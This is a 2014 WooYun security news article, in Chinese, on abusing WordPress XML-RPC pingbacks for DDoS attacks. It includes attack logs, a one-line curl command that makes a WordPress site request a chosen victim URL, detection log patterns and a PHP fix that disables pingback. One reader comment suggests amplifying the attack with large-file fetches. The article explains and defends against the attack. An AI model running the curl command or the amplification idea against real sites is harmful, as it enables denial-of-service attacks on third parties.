<main class="main-container ng-scope" ng-view=""><div class="main receptacle post-view ng-scope"><article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox=""><header><h1 class="entry-title ng-binding">超过16W的WordPress网站被用来做DDoS攻击</h1><div class="entry-meta"><a target="_blank" class="author name ng-binding">news</a> <span class="bull">·</span> <time title="2014/03/13 10:21" ui-time="" datetime="2014/03/13 10:21" class="published ng-binding ng-isolate-scope">2014/03/13 10:21</time></div></header><section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml"><p></p><p><img alt="enter image description here" img-src="8b767b391f09fa78c6f8da9910c1117f3efcd6ca.jpg"></p><p>任何开启了Pingback（默认就开启）的WordPress的站点可以被用来做DDOS攻击其它服务器。</p><p>看如下日志：</p><pre><code>#!bash
74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"
121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com" 
217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr" 
193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de" 
..
</code></pre><p>可以发现每次请求还增加了随机数<code>/?3162504=9747583</code>以此来绕过缓存。</p><p>测试这种攻击方式只需要一个curl命令就可以了：</p><pre><code>#!bash
$ curl -D -  "www.anywordpresssite.com/xmlrpc.php" -d '&lt;methodCall&gt;&lt;methodName&gt;pingback.ping&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;http://victim.com&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;www.anywordpresssite.com/postchosen&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;'
</code></pre><p>想要看你自己的网站是否被用来做了攻击可以查看日志当中是否包含类似如下的内容：</p><pre><code>#!bash
93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:&lt;?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?&gt;\x0A&lt;methodCall&gt;\x0A&lt;methodName&gt;pingback.ping&lt;/methodName&gt;\x0A&lt;params&gt;\x0A &lt;param&gt;\x0A  &lt;value&gt;\x0A   &lt;string&gt;http://fastbet99.com/?1698491=8940641&lt;/string&gt;\x0A  &lt;/value&gt;\x0A &lt;/param&gt;\x0A &lt;param&gt;\x0A  &lt;value&gt;\x0A   &lt;string&gt;yoursite.com&lt;/string&gt;\x0A  &lt;/value&gt;\x0A &lt;/param&gt;\x0A&lt;/params&gt;\x0A&lt;/methodCall&gt;\x0A"

94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"
</code></pre><p>防御此问题的推荐方法需要屏蔽 XML-RPC (pingback) 的功能，WordPress主题中添加如下代码：</p><pre><code>#!php
add_filter( 'xmlrpc_methods', function( $methods ) {
   unset( $methods['pingback.ping'] );
   return $methods;
} );
</code></pre><p></p></section></article><div class="entry-controls clearfix"><div style="float:left;color:#9d9e9f;font-size:15px"><span>&copy;乌云知识库版权所有 未经许可 禁止转载</span></div></div><div class="yarpp-related"><h3>为您推荐了适合您的技术文章:</h3><ol id="recommandsystem"><li><a href="http://drops.wooyun.org/papers/9510" rel="bookmark" id="re1">WordPress 利用 XMLRPC 高效爆破 原理分析</a></li><li><a href="http://drops.wooyun.org/news/1401" rel="bookmark" id="re2">WordPress更新至 3.8.2 修复多个漏洞</a></li><li><a href="http://drops.wooyun.org/papers/6035" rel="bookmark" id="re3">Oracle盲注结合XXE漏洞远程获取数据</a></li><li><a href="http://drops.wooyun.org/news/1205" rel="bookmark" id="re4">chrome 33中修复了4个Pwn2Own大会上发现的漏洞</a></li></ol></div><div id="comments" class="comment-list clearfix"><div id="comment-list"><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">trustzone</span> <span class="reply-time">2014-05-31 14:58:27</span></div><p></p><p>之前一直觉得wordpress里有些url请求很奇怪，看到这篇恍然大悟！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">独行猫儿</span> <span class="reply-time">2014-03-19 12:00:16</span></div><p></p><p>屏蔽 XML-RPC (pingback) 的功能，不会因噎废食么？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xsser</span> <span class="reply-time">2014-03-18 16:03:54</span></div><p></p><p>proxy代理没有wordpress好找不</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">瞌睡龙</span> <span class="reply-time">2014-03-18 15:36:04</span></div><p></p><p>让他去GET一个几个G的大文件呢？<br>几万个服务器去你服务器上下载一个超大文件~</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">云舒</span> <span class="reply-time">2014-03-18 15:21:19</span></div><p></p><p>那为啥不找Proxy代理……</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xsser</span> <span class="reply-time">2014-03-18 15:03:06</span></div><p></p><p>是不是为了隐藏自己的肉鸡啊</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">云舒</span> <span class="reply-time">2014-03-18 14:58:21</span></div><p></p><p>感觉好逗。接到POST包的blog a会去GET一下目标的某页面，这样受到伤害最大的是被利用的blog a本身，木有放大啊……用多个blog去ping一个，还不如用一个blog a去ping很多blog，POST包+返回response淹没blog a。难道是我测试的blog配置比较特殊？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">核攻击</span> <span class="reply-time">2014-03-17 10:34:35</span></div><p></p><p>好思路！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">d3pT1</span> <span class="reply-time">2014-03-16 20:07:36</span></div><p></p><p>咋样测试此漏洞存在冷？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">寂寞的瘦子</span> <span class="reply-time">2014-03-13 17:09:45</span></div><p></p><p>每次看到这个w的图标就有种看到一辆辆的上海大众，大家有没有？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">卡卡</span> <span class="reply-time">2014-03-13 10:47:09</span></div><p></p><p>东莞人民需要你！</p><p></p></div></div></div></div></div></main>